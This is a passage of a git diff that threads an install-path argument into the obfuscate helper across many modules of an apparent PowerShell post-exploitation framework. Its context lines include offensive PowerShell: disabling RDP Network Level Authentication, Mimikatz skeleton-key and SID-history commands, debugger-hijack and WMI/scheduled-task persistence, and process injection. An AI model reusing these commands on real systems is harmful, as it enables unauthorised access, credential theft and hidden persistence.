+136,5 @@ class Module: script += ";'Invoke-PSRemoting executed on " +computerNames +"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py index 316cae5..2bfdbd2 100644 --- a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py +++ b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py @@ -132,6 +132,6 @@ class Module: if password != "": scriptEnd += " -Password "+password if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_sshcommand.py b/lib/modules/powershell/lateral_movement/invoke_sshcommand.py index 7cef7e8..0464e0b 100644 --- a/lib/modules/powershell/lateral_movement/invoke_sshcommand.py +++ b/lib/modules/powershell/lateral_movement/invoke_sshcommand.py @@ -123,6 +123,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_wmi.py b/lib/modules/powershell/lateral_movement/invoke_wmi.py index 23e5fb5..db318bc 100644 --- a/lib/modules/powershell/lateral_movement/invoke_wmi.py +++ b/lib/modules/powershell/lateral_movement/invoke_wmi.py @@ -145,5 +145,5 @@ class Module: script += ";'Invoke-Wmi executed on " +computerNames +"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py b/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py index afbd7b0..f7508a3 100644 --- a/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py +++ b/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py @@ -187,6 +187,6 @@ class Module: script += ";'Invoke-Wmi executed on " +computerNames + statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/lateral_movement/jenkins_script_console.py b/lib/modules/powershell/lateral_movement/jenkins_script_console.py index 16b49e4..cb70a24 100644 --- a/lib/modules/powershell/lateral_movement/jenkins_script_console.py +++ b/lib/modules/powershell/lateral_movement/jenkins_script_console.py @@ -121,6 +121,6 @@ class Module: scriptEnd += " -Port "+str(self.options['Port']['Value']) scriptEnd += " -Cmd \"" + launcher + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py b/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py index cd01e68..3202f92 100644 --- a/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py +++ b/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py @@ -162,5 +162,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/disable_rdp.py b/lib/modules/powershell/management/disable_rdp.py index 3cb332a..dd368c7 100644 --- a/lib/modules/powershell/management/disable_rdp.py +++ b/lib/modules/powershell/management/disable_rdp.py @@ -55,5 +55,5 @@ class Module: # command to enable NLA only if the enable runs successfully script += " if ($?) { $null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/downgrade_account.py b/lib/modules/powershell/management/downgrade_account.py index a711b0f..3d385df 100644 --- a/lib/modules/powershell/management/downgrade_account.py +++ b/lib/modules/powershell/management/downgrade_account.py @@ -100,5 +100,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/enable_multi_rdp.py b/lib/modules/powershell/management/enable_multi_rdp.py index 1db6588..b3eb8d1 100644 --- a/lib/modules/powershell/management/enable_multi_rdp.py +++ b/lib/modules/powershell/management/enable_multi_rdp.py @@ -73,6 +73,6 @@ class Module: scriptEnd = "Invoke-Mimikatz -Command '\"ts::multirdp\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/enable_rdp.py b/lib/modules/powershell/management/enable_rdp.py index e7a27a5..4c45a8e 100644 --- a/lib/modules/powershell/management/enable_rdp.py +++ b/lib/modules/powershell/management/enable_rdp.py @@ -57,5 +57,5 @@ class Module: # command to disable NLA script += "$null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f }" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/get_domain_sid.py b/lib/modules/powershell/management/get_domain_sid.py index 1c10faa..61786bf 100644 --- a/lib/modules/powershell/management/get_domain_sid.py +++ b/lib/modules/powershell/management/get_domain_sid.py @@ -84,5 +84,5 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/honeyhash.py b/lib/modules/powershell/management/honeyhash.py index 575fd97..899b985 100644 --- a/lib/modules/powershell/management/honeyhash.py +++ b/lib/modules/powershell/management/honeyhash.py @@ -90,6 +90,6 @@ class Module: if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/invoke_script.py b/lib/modules/powershell/management/invoke_script.py index 1b0b4f4..f828e33 100644 --- a/lib/modules/powershell/management/invoke_script.py +++ b/lib/modules/powershell/management/invoke_script.py @@ -77,5 +77,5 @@ class Module: script += "%s" %(scriptCmd) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/lock.py b/lib/modules/powershell/management/lock.py index 9315a87..83b339d 100644 --- a/lib/modules/powershell/management/lock.py +++ b/lib/modules/powershell/management/lock.py @@ -87,5 +87,5 @@ Function Invoke-LockWorkStation { Invoke-LockWorkStation; "Workstation locked." """ if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/logoff.py b/lib/modules/powershell/management/logoff.py index 4508776..8eef8c3 100644 --- a/lib/modules/powershell/management/logoff.py +++ b/lib/modules/powershell/management/logoff.py @@ -62,5 +62,5 @@ class Module: else: script = "'Logging off current user.'; Start-Sleep -s 3; shutdown /l /f" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/mailraider/disable_security.py b/lib/modules/powershell/management/mailraider/disable_security.py index 7bf6639..ebb3d86 100644 --- a/lib/modules/powershell/management/mailraider/disable_security.py +++ b/lib/modules/powershell/management/mailraider/disable_security.py @@ -110,6 +110,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/get_emailitems.py b/lib/modules/powershell/management/mailraider/get_emailitems.py index d7229cf..8a9f219 100644 --- a/lib/modules/powershell/management/mailraider/get_emailitems.py +++ b/lib/modules/powershell/management/mailraider/get_emailitems.py @@ -87,6 +87,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/get_subfolders.py b/lib/modules/powershell/management/mailraider/get_subfolders.py index e61c68d..46856a1 100644 --- a/lib/modules/powershell/management/mailraider/get_subfolders.py +++ b/lib/modules/powershell/management/mailraider/get_subfolders.py @@ -87,6 +87,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/mail_search.py b/lib/modules/powershell/management/mailraider/mail_search.py index 9494cfd..f0c85fe 100644 --- a/lib/modules/powershell/management/mailraider/mail_search.py +++ b/lib/modules/powershell/management/mailraider/mail_search.py @@ -112,6 +112,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/search_gal.py b/lib/modules/powershell/management/mailraider/search_gal.py index db46b09..971e4e9 100644 --- a/lib/modules/powershell/management/mailraider/search_gal.py +++ b/lib/modules/powershell/management/mailraider/search_gal.py @@ -107,6 +107,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/send_mail.py b/lib/modules/powershell/management/mailraider/send_mail.py index d25094f..e5733ad 100644 --- a/lib/modules/powershell/management/mailraider/send_mail.py +++ b/lib/modules/powershell/management/mailraider/send_mail.py @@ -117,6 +117,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/view_email.py b/lib/modules/powershell/management/mailraider/view_email.py index 3495c56..f162fda 100644 --- a/lib/modules/powershell/management/mailraider/view_email.py +++ b/lib/modules/powershell/management/mailraider/view_email.py @@ -92,6 +92,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/psinject.py b/lib/modules/powershell/management/psinject.py index 1c8c9da..cd22b64 100644 --- a/lib/modules/powershell/management/psinject.py +++ b/lib/modules/powershell/management/psinject.py @@ -133,6 +133,6 @@ class Module: else: scriptEnd += "Invoke-PSInject -ProcName %s -PoshCode %s" % (procName, launcherCode) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/reflective_inject.py b/lib/modules/powershell/management/reflective_inject.py index 1bb50a9..e5d19ea 100644 --- a/lib/modules/powershell/management/reflective_inject.py +++ b/lib/modules/powershell/management/reflective_inject.py @@ -146,7 +146,7 @@ class Module: UploadScript = self.mainMenu.stagers.generate_upload(dll, fullUploadPath) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += "\r\n" script += UploadScript diff --git a/lib/modules/powershell/management/restart.py b/lib/modules/powershell/management/restart.py index 867a650..dee7562 100644 --- a/lib/modules/powershell/management/restart.py +++ b/lib/modules/powershell/management/restart.py @@ -52,5 +52,5 @@ class Module: script = "'Restarting computer';Restart-Computer -Force" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/runas.py b/lib/modules/powershell/management/runas.py index c61dfb1..1978eb7 100644 --- a/lib/modules/powershell/management/runas.py +++ b/lib/modules/powershell/management/runas.py @@ -138,6 +138,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/sid_to_user.py b/lib/modules/powershell/management/sid_to_user.py index 20f81c3..9978ce0 100644 --- a/lib/modules/powershell/management/sid_to_user.py +++ b/lib/modules/powershell/management/sid_to_user.py @@ -57,5 +57,5 @@ class Module: script = "(New-Object System.Security.Principal.SecurityIdentifier(\"%s\")).Translate( [System.Security.Principal.NTAccount]).Value" %(self.options['SID']['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/spawn.py b/lib/modules/powershell/management/spawn.py index 80e29df..30bd569 100644 --- a/lib/modules/powershell/management/spawn.py +++ b/lib/modules/powershell/management/spawn.py @@ -100,5 +100,5 @@ class Module: code = "Start-Process -NoNewWindow -FilePath \"%s\" -ArgumentList '%s'; 'Agent spawned to %s'" % (parts[0], " ".join(parts[1:]), listenerName) if obfuscate: - code = helpers.obfuscate(psScript=code, obfuscationCommand=obfuscationCommand) + code = helpers.obfuscate(self.mainMenu.installPath, psScript=code, obfuscationCommand=obfuscationCommand) return code diff --git a/lib/modules/powershell/management/spawnas.py b/lib/modules/powershell/management/spawnas.py index 43151eb..d54baa6 100644 --- a/lib/modules/powershell/management/spawnas.py +++ b/lib/modules/powershell/management/spawnas.py @@ -157,6 +157,6 @@ class Module: scriptEnd += "-Cmd \"$env:public\debug.bat\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/switch_listener.py b/lib/modules/powershell/management/switch_listener.py index 8d5b3da..e021401 100644 --- a/lib/modules/powershell/management/switch_listener.py +++ b/lib/modules/powershell/management/switch_listener.py @@ -71,5 +71,5 @@ class Module: # signal the existing listener that we're switching listeners, and the new comms code commsCode = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (listenerName, commsCode) if obfuscate: - commsCode = helpers.obfuscate(psScript=commsCode, obfuscationCommand=obfuscationCommand) + commsCode = helpers.obfuscate(self.mainMenu.installPath, psScript=commsCode, obfuscationCommand=obfuscationCommand) return commsCode diff --git a/lib/modules/powershell/management/timestomp.py b/lib/modules/powershell/management/timestomp.py index bb20f46..69a5b91 100644 --- a/lib/modules/powershell/management/timestomp.py +++ b/lib/modules/powershell/management/timestomp.py @@ -108,6 +108,6 @@ class Module: scriptEnd += "| Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/user_to_sid.py b/lib/modules/powershell/management/user_to_sid.py index 861b7bd..b6bbddd 100644 --- a/lib/modules/powershell/management/user_to_sid.py +++ b/lib/modules/powershell/management/user_to_sid.py @@ -63,5 +63,5 @@ class Module: script = "(New-Object System.Security.Principal.NTAccount(\"%s\",\"%s\")).Translate([System.Security.Principal.SecurityIdentifier]).Value" %(self.options['Domain']['Value'], self.options['User']['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/vnc.py b/lib/modules/powershell/management/vnc.py index e3ef899..e8f4836 100644 --- a/lib/modules/powershell/management/vnc.py +++ b/lib/modules/powershell/management/vnc.py @@ -102,6 +102,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/wdigest_downgrade.py b/lib/modules/powershell/management/wdigest_downgrade.py index c8edfda..ecec54f 100644 --- a/lib/modules/powershell/management/wdigest_downgrade.py +++ b/lib/modules/powershell/management/wdigest_downgrade.py @@ -151,5 +151,5 @@ function Invoke-WdigestDowngrade { else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/zipfolder.py b/lib/modules/powershell/management/zipfolder.py index 8771365..8dc5ca5 100644 --- a/lib/modules/powershell/management/zipfolder.py +++ b/lib/modules/powershell/management/zipfolder.py @@ -93,5 +93,5 @@ Invoke-ZipFolder""" if values['Value'] and values['Value'] != '': script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/elevated/registry.py b/lib/modules/powershell/persistence/elevated/registry.py index 8fd7f1d..2ab37ac 100644 --- a/lib/modules/powershell/persistence/elevated/registry.py +++ b/lib/modules/powershell/persistence/elevated/registry.py @@ -205,5 +205,5 @@ class Module: script += "'Registry persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/elevated/schtasks.py b/lib/modules/powershell/persistence/elevated/schtasks.py index 3f130c0..fbad434 100644 --- a/lib/modules/powershell/persistence/elevated/schtasks.py +++ b/lib/modules/powershell/persistence/elevated/schtasks.py @@ -161,7 +161,7 @@ class Module: script += "schtasks /Delete /F /TN "+taskName+";" script += "'Schtasks persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -241,5 +241,5 @@ class Module: statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "." script += "'Schtasks persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/elevated/wmi.py b/lib/modules/powershell/persistence/elevated/wmi.py index 50e82a9..9b68e0c 100644 --- a/lib/modules/powershell/persistence/elevated/wmi.py +++ b/lib/modules/powershell/persistence/elevated/wmi.py @@ -124,7 +124,7 @@ class Module: script += "Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match '"+subName+"'} | Remove-WmiObject;" script += "'WMI persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -199,5 +199,5 @@ class Module: script += "'WMI persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/add_netuser.py b/lib/modules/powershell/persistence/misc/add_netuser.py index 0d41676..44fc980 100644 --- a/lib/modules/powershell/persistence/misc/add_netuser.py +++ b/lib/modules/powershell/persistence/misc/add_netuser.py @@ -107,5 +107,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/add_sid_history.py b/lib/modules/powershell/persistence/misc/add_sid_history.py index 914b281..9f148f2 100644 --- a/lib/modules/powershell/persistence/misc/add_sid_history.py +++ b/lib/modules/powershell/persistence/misc/add_sid_history.py @@ -90,6 +90,6 @@ class Module: # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/misc/debugger.py b/lib/modules/powershell/persistence/misc/debugger.py index 19be5a7..f9f8c6f 100644 --- a/lib/modules/powershell/persistence/misc/debugger.py +++ b/lib/modules/powershell/persistence/misc/debugger.py @@ -94,7 +94,7 @@ class Module: # the registry command to disable the debugger for Utilman.exe script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s';'%s debugger removed.'" %(targetBinary, targetBinary) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script @@ -133,5 +133,5 @@ class Module: # the registry command to set the debugger for the specified binary to be the binary path specified script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"' -Name Debugger -Value '"+triggerBinary+"';'"+targetBinary+" debugger set to "+triggerBinary+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py b/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py index d06efe4..1ef774a 100644 --- a/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py +++ b/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py @@ -61,10 +61,10 @@ class Module: if cleanup.lower() == 'true': script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 0; 'Machine account password change re-enabled.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 1; 'Machine account password change disabled.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/get_ssps.py b/lib/modules/powershell/persistence/misc/get_ssps.py index 88a9c2c..5206dab 100644 --- a/lib/modules/powershell/persistence/misc/get_ssps.py +++ b/lib/modules/powershell/persistence/misc/get_ssps.py @@ -191,5 +191,5 @@ Get-SecurityPackages if values['Value'] and values['Value'] != '': script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/install_ssp.py b/lib/modules/powershell/persistence/misc/install_ssp.py index d8f7df8..8e717d6 100644 --- a/lib/modules/powershell/persistence/misc/install_ssp.py +++ b/lib/modules/powershell/persistence/misc/install_ssp.py @@ -264,5 +264,5 @@ into lsass, the dll must export SpLsaModeInitialize. if values['Value'] and values['Value'] != '': script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/memssp.py b/lib/modules/powershell/persistence/misc/memssp.py index 42d4e3a..2e6cabc 100644 --- a/lib/modules/powershell/persistence/misc/memssp.py +++ b/lib/modules/powershell/persistence/misc/memssp.py @@ -79,6 +79,6 @@ class Module: scriptEnd += '"memssp installed, check C:\Windows\System32\mimisla.log for logon events."' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/misc/skeleton_key.py b/lib/modules/powershell/persistence/misc/skeleton_key.py index 36c3a52..58bc424 100644 --- a/lib/modules/powershell/persistence/misc/skeleton_key.py +++ b/lib/modules/powershell/persistence/misc/skeleton_key.py @@ -79,6 +79,6 @@ class Module: scriptEnd += '"Skeleton key implanted. Use password \'mimikatz\' for access."' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/powerbreach/deaduser.py b/lib/modules/powershell/persistence/powerbreach/deaduser.py index 7c75df6..1ecb1b3 100644 --- a/lib/modules/powershell/persistence/powerbreach/deaduser.py +++ b/lib/modules/powershell/persistence/powerbreach/deaduser.py @@ -185,7 +185,7 @@ Invoke-DeadUserBackdoor""" return "" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the 